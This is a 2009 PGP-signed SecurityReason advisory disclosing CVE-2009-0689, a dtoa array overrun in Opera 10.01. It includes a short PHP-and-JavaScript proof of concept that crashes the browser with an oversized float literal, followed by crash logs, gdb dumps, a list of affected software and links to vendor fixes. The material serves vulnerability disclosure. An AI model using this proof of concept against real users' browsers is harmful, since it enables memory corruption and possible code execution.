Opera 10.01 Remote Array Overrun (Arbitrary code execution)

                                                -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[ Opera 10.01 Remote Array Overrun (Arbitrary code execution) ]

Author: Maksymilian Arciemowicz and sp3x
http://SecurityReason.com
Date:
- - Dis.: 07.05.2009
- - Pub.: 20.11.2009

CVE: CVE-2009-0689
Risk: High
Remote: Yes

Affected Software:
- - Opera 10.01
- - Opera 10.10 Beta

NOTE: Prior versions may also be affected.

Original URL:
http://securityreason.com/achievement_securityalert/73


- --- 0.Description ---
Opera is a Web browser and Internet suite developed by the Opera Software company. \
The browser handles common Internet-related tasks such as displaying Web sites, \
sending and receiving e-mail messages, managing contacts, IRC online chatting, \
downloading files via BitTorrent, and reading Web feeds. Opera is offered free of \
charge for personal computers and mobile phones.


- --- 1. Opera 10.01 Remote Array Overrun (Arbitrary code execution) ---
The main problem exist in dtoa implementation. Opera has a very similar dtoa \
algorithm to the BSD, Chrome and Mozilla products. It is the same issue like \
SREASONRES:20090625.

http://securityreason.com/achievement_securityalert/63

but fix for SREASONRES:20090625, used by openbsd was not good. 
More information about fix for openbsd and similars SREASONRES:20091030, 

http://securityreason.com/achievement_securityalert/69

We can create any number of float, which will overwrite the memory. In Kmax has \
defined 15. Functions in dtoa, don't checks Kmax limit, and it is possible to call \
16<= elements of freelist array.


- --- 2. Proof of Concept  (PoC) ---

- -----------------------
<script>
var a=0.<?php echo str_repeat("9",299999); ?>;
</script>
- -----------------------

If we use Opera to see this PoC, Opera will crash. For example

- -----------------------
<script>
var a=0.<?php echo str_repeat("1",296450); ?>;
</script>
- -----------------------

OPERA-CRASHLOG V1 desktop 10.01 1844 windows
Opera.exe 1844 caused exception C0000005 at address 67956906 (Base: 400000)

Registers:
EAX=01165C40   EBX=0592064C   ECX=A0D589D4   EDX=42000000   ESI=C20471EC
EDI=00000000   EBP=0012E384   ESP=0012E2FC   EIP=67956906 FLAGS=00010202
CS=001B   DS=0023   SS=0023   ES=0023   FS=003B   GS=0000
FPU stack:
C020A38F66534266F000 C020A38F66534266F000 3FFBE38E38E38E38D800
3FC78000000000000000 10000000000100000000 0BBE0000000000040000
00000000000000000000 2EBA804E2FDE00000000 SW=0122 CW=027F

127# gdb -q opera opera.core
...
Program terminated with signal 11, Segmentation fault.
#0  0x2960307b in ?? ()
...
(gdb) i r
eax            0x71c71c71       1908874353
ecx            0x2aa03be4       715144164
edx            0x0      0
ebx            0x296177f8       694253560
esp            0xbfbfb650       0xbfbfb650
ebp            0xbfbfb698       0xbfbfb698
esi            0x2962d000       694341632
edi            0x0      0
eip            0x2960307b       0x2960307b
...
(gdb) x/100x ($esi)-90
0x2962cfa6:     0x71c71c71      0x1c71c71c      0xc71c71c7      0x71c71c71
0x2962cfb6:     0x1c71c71c      0xc71c71c7      0x71c71c71      0x1c71c71c
0x2962cfc6:     0xc71c71c7      0x71c71c71      0x1c71c71c      0xc71c71c7
0x2962cfd6:     0x71c71c71      0x1c71c71c      0xc71c71c7      0x71c71c71
0x2962cfe6:     0x1c71c71c      0xc71c71c7      0x71c71c71      0x1c71c71c
0x2962cff6:     0xc71c71c7      0x71c71c71      Cannot access memory at address \
                0x2962cffe
...


- --- 3. SecurityReason Note ---

Officialy SREASONRES:20090625 has been detected in:
- - OpenBSD
- - NetBSD
- - FreeBSD
- - MacOSX
- - Google Chrome
- - Mozilla Firefox
- - Mozilla Seamonkey
- - KDE (example: konqueror)
- - Opera
- - K-Meleon

This list is not yet closed. US-CERT declared that will inform all vendors about this \
issue, however, they did not do it. Even greater confusion caused new CVE number \
"CVE-2009-1563". Secunia has informed that this vulnerability was only detected in \
Mozilla Firefox, but nobody was aware that the problem affects other products like ( \
KDE, Chrome ) and it is based on "CVE-2009-0689". After some time Mozilla Foundation \
Security Advisory ("http://www.mozilla.org/security/announce/2009/mfsa2009-59.html")
was updated with note :
"The underlying flaw in the dtoa routines used by Mozilla appears to be essentially \
the same as that reported against the libc gdtoa routine by Maksymilian Arciemowicz ( \
CVE-2009-0689)". This fact ( new CVE number for Firefox Vulnerability )and PoC in \
javascript (from Secunia), forced us to official notification all other vendors. We \
publish all the individual advisories, to formally show all vulnerable software and \
to avoid wrong CVE number. We do not see any other way to fix this issue in all \
products.


- --- 4. Fix ---
Opera fix:
The vulnerability was fixed in the latest release candidate Opera RC3 : \
http://snapshot.opera.com/windows/Opera_1010_1890_in.exe In shortly time we can \
expect the final verion of Opera with the fix. 

NetBSD fix (optimal):
http://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gdtoa/gdtoaimp.h

OpenBSD fix:
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/sum.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorx.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtord.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorQ.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtof.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodg.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtod.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/smisc.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/misc.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/hdtoa.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gethex.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gdtoa.h
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dtoa.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dmisc.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdio/vfprintf.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/arch/vax/gdtoa/strtof.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorxL.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorf.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtordd.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopxL.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopx.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopf.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopdd.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopd.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopQ.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodnrp.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodI.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIxL.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIx.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIg.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIf.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIdd.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoId.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIQ.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/qnan.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xfmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xLfmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ffmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_dfmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ddfmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g__fmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_Qfmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/arithchk.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/gcvt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/ecvt.c


- --- 5. Credits ---
Discovered by Maksymilian Arciemowicz and sp3x from SecurityReason.com.


- --- 6. Greets ---
Infospec p_e_a pi3


- --- 7. Contact ---
Email: 
- - cxib {a.t] securityreason [d0t} com
- - sp3x {a.t] securityreason [d0t} com 

GPG: 
- - http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
- - http://securityreason.com/key/sp3x.gpg

http://securityreason.com/
http://securityreason.pl/

-----BEGIN PGP SIGNATURE-----

iEYEARECAAYFAksF2G8ACgkQpiCeOKaYa9YMzACgwvAI8oo1UP6GwlmGq3m+gkHm
mVoAnArUxHXAPkrpEPOOLi4X99l5sAFh
=VtH9
-----END PGP SIGNATURE-----